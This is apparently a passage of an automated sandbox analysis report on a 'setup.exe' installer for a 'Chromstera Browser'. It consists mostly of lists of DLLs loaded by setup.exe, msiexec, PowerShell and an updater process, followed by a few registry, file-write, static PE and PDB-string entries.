                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: davhlpr.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: lpk.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msihnd.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: tsappcmp.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: version.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: davhlpr.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: msimg32.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: lpk.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: msihnd.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\Installer\MSI4739.tmpSection loaded: msi.dll
                      Source: C:\Windows\Installer\MSI4739.tmpSection loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile written: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.iniJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Chromstera Browser 1.0.0.0Jump to behavior
                      Source: setup.exeStatic PE information: certificate valid
                      Source: setup.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: setup.exeStatic file information: File size 9454152 > 1048576
                      Source: setup.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x26ae00
                      Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: setup.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: Binary string: wininet.pdb source: setup.exe, 00000000.00000003.1719958497.0000000005251000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000003.00000003.1746421738.00000000039F2000.00000004.00000020.00020000.00000000.sdmp, shi3105.tmp.0.dr
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbR source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdbg source: setup.exe, MSIEC26.tmp.1.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: setup.exe, viewer.exe.0.dr, Chromnius-Main.msi.0.dr
                      Source: Binary string: n.pdb" source: powershell.exe, 00000006.00000002.1831930535.000002526E09C000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E346000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: 31bf3856ad364e35corlib.pdb source: powershell.exe, 00000006.00000002.1833673011.000002526E2D6000.00000004.00000020.00020000.00000000.sdmp
